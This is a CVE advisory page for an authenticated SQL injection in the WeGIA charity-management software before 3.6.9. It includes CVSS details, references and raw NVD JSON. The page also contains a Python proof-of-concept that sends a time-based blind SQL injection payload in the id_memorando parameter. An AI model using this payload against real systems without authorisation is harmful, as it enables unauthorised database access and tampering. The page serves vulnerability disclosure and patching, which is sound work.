CVE-2026-35395

Description

WeGIA is a Web manager for charitable institutions. Prior to 3.6.9, WeGIA (Web gerenciador para instituições assistenciais) contains a SQL injection vulnerability in dao/memorando/DespachoDAO.php. The id_memorando parameter is extracted from $_REQUEST without validation and directly interpolated into SQL queries, allowing any authenticated user to execute arbitrary SQL commands against the database. This vulnerability is fixed in 3.6.9.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wegia:wegia:*:*:*:*:*:*:*:* - VULNERABLE

WeGIA < 3.6.9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL example
# The vulnerable file is dao/memorando/DespachoDAO.php
url = "http://target-weigia-instance/dao/memorando/DespachoDAO.php"

# The vulnerable parameter is 'id_memorando'
# Payload to test SQL Injection (Blind or Error based)
# Attempting to cause a delay or specific output to confirm vulnerability
payload = {
    "id_memorando": "1' AND SLEEP(5)-- -"
}

try:
    # Send the request
    # Note: Authentication cookie/session may be required as PR:L is Low
    response = requests.get(url, params=payload, timeout=10)

    # Analyze response time to confirm blind SQL injection
    if response.elapsed.total_seconds() >= 5:
        print("[+] Vulnerability Confirmed: SQL Injection detected via time-based analysis.")
    else:
        print("[-] Test failed or patched.")

except requests.RequestException as e:
    print(f"Error connecting to target: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35395
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35395
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35395/
[4] VulDB https://vuldb.com/cve/CVE-2026-35395
[5] https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-43jm-pcrq-w7gv
[6] https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-43jm-pcrq-w7gv

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35395", "sourceIdentifier": "[email protected]", "published": "2026-04-06T21:16:21.450", "lastModified": "2026-04-09T17:40:26.883", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WeGIA is a Web manager for charitable institutions. Prior to 3.6.9, WeGIA (Web gerenciador para instituições assistenciais) contains a SQL injection vulnerability in dao/memorando/DespachoDAO.php. The id_memorando parameter is extracted from $_REQUEST without validation and directly interpolated into SQL queries, allowing any authenticated user to execute arbitrary SQL commands against the database. This vulnerability is fixed in 3.6.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wegia:wegia:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.6.9", "matchCriteriaId": "A2128E5A-1B2E-4FD4-ADCE-1F7A619DFD51"}]}]}], "references": [{"url": "https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-43jm-pcrq-w7gv", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-43jm-pcrq-w7gv", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}